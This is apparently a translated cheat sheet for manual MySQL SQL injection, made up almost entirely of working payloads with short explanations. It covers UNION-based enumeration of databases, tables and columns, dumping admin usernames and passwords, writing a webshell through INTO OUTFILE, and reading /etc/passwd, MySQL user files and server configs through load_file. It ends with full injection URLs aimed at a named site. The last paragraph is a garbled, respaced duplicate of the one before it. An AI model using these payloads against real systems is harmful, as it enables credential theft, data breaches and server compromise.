and ord(mid(version(),1,1))>51
Explanation 1: 51 is the ASCII code of "3", so this checks whether the first character of the version string is greater than "3". If the page returns normally, the database version is greater than 4.0 and the union method can be used;
Explanation 2: ord() is a MySQL function that returns the character code of a character;
Explanation 3: mid() is a MySQL function that takes part of a string (here the first character);
Explanation 4: version() is a MySQL function that returns the current database version;
union select 1, ***
Explanation: tests the number of fields returned by the current SQL query;
order by 13
Explanation: sorts by field position, which tests the number of fields returned by the current SQL query.
union select 1, ***, 13 from admin
Explanation: if the result is returned correctly, the table admin exists.
union select 1, version(), 3, ***, 13 from admin
Explanation: dump the database version
union select 1, username, 3, ***, 13 from admin
Explanation: dump accounts/passwords
union select 1, username, 3, ***, 13 from admin where id = 2
Explanation: dump the user in the admin table whose primary key ID is 2.
and ord(mid(user(),1,1))=114
Explanation: determine whether the current user has root permission; if the page returns correctly, it does (114 is the ASCII code of "r").
and 1=1 union select 1, 2, 4, 5 ....... N
Explanation: match the number of fields
and 1=2 union select 1, 2, 3, 4, 5 ..... N
Explanation: dump the field positions (which fields are displayed on the page)
version() database() user()
Explanation: use built-in functions to dump database information
Dumping database information without guessing the usable field (not applicable to some websites):
and 1=2 union all select version()
and 1=2 union all select database()
and 1=2 union all select user()
and 1=2 union all select @@global.version_compile_os from mysql.user
Explanation: obtains operating system information
and ord(mid(user(),1,1))=114
Explanation: obtains the database permission; if the page returns normally, it indicates root permission.
and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1
Explanation: dump the databases (MySQL > 5.0). MySQL 5 and above have a built-in database, information_schema, which stores the structure information of all databases and tables in MySQL.
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=database name (hexadecimal) limit 0,1
Explanation: guess table names. In limit 0,1 the 0 is the starting record (0 means start from the first record) and the 1 is the number of records displayed.
and 1=2 union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=table name (hexadecimal) limit 0,1
Explanation: guess field names
and 1=2 union select 1,2,3,username field,5,6,7,password field,8,9 from table name limit 0,1
Explanation: dump the passwords
union select 1,2,3,concat(username field,0x3c,password field),5,6,7,8,9 from table name limit 0,1
Explanation: advanced usage (one displayed field shows two pieces of data)
Writing a webshell directly (root permission)
Condition 1: the physical path of the site is known
Condition 2: sufficient permissions (can be tested with select .... from mysql.user)
Condition 3: magic_quotes_gpc() = OFF
select '' into outfile 'physical path', or: and 1=2 union all select <statement HEX value> into outfile 'path'
load_file() common paths:
replace(load_file(0x2F6574632F706173737764),0x3c,0x20)
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
Explanation: the two statements above display the code of a PHP file in full. Sometimes some characters are not replaced, so "<" must be replaced with a space; otherwise what comes back is rendered as a web page and the code cannot be viewed.
load_file(char(47))
Explanation: lists the root directory on FreeBSD and SunOS systems.
/etc/httpd/conf/httpd.conf or /usr/local/apache/conf/httpd.conf
Explanation: view the Apache virtual host configuration file on Linux.
C:\Program Files\Apache Group\Apache\conf\httpd.conf or C:\apache\conf\httpd.conf
Explanation: view the Apache configuration file on Windows
C:/Resin-3.0.14/conf/resin.conf
Explanation: view the Resin configuration file of a website developed in JSP
C:/Resin/conf/resin.conf or /usr/local/resin/conf/resin.conf
Explanation: view the JSP virtual hosts configured on Linux
D:\APACHE\Apache2\conf\httpd.conf
C:\Program Files\mysql\my.ini
../themes/darkblue_orange/layout.inc.php (phpMyAdmin)
Explanation: reveals the physical path
C:\windows\system32\inetsrv\MetaBase.xml
Explanation: view the IIS virtual host configuration file
/usr/local/resin-3.0.22/conf/resin.conf
Explanation: view the Resin 3.0.22 configuration file
/usr/local/resin-pro-3.0.22/conf/resin.conf: same as above
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf
Explanation: view the Apache virtual hosts
/etc/sysconfig/iptables
Explanation: this file holds the firewall policy.
/usr/local/app/php5 B/php.ini
Explanation: PHP settings
/etc/my.cnf
Explanation: MySQL configuration file
/etc/redhat-release
Explanation: Red Hat system version
C:\mysql\data\mysql\user.MYD
Explanation: user passwords in MySQL
/etc/sysconfig/network-scripts/ifcfg-eth0
Explanation: view the IP address
C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
C:\windows\my.ini
C:\boot.ini
Common website configuration files: config.inc.php and config.php. load_file() must be used in the form replace(load_file(HEX),char(60),char(32)).
Note: char(60) is "<", char(32) is a space
Problems encountered in manual injection:
After injecting, the page displays: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'Union'
For example: http://www.www.myhack58.com/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,load_file(0x433A5C626F6F742E696E69),3,4,user()%20
This is caused by inconsistent character encodings between the front end and the back end. Solution: wrap the parameter in unhex(hex(parameter)). The URL above becomes:
http://www.www.myhack58.com/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,unhex(hex(load_file(0x433A5C626F6F742E696E69))),3,4,unhex(hex(user()))%20
and the injection can continue.
Such as: http://www.www.myhack58.com/mse/research/instrument.php? ID = 13% 20and % 201 = 2% 20 union % 20 select % 201, load_file (0x433A5C626F6F742E696E69), 3,4, user () % 20, which is caused by inconsistent front and back encoding, solution: add unhex (hex (parameter) before the parameter. The above URL can be changed to: http://www.www.myhack58.com/mse/research/instrument.php? ID = 13% 20and % 201 = 2% 20 union % 20 select % 201, unhex (hex (load_file (0x433A5C626F6F742E696E69), 3,4, unhex (hex (user ())) % 20. you can continue the injection.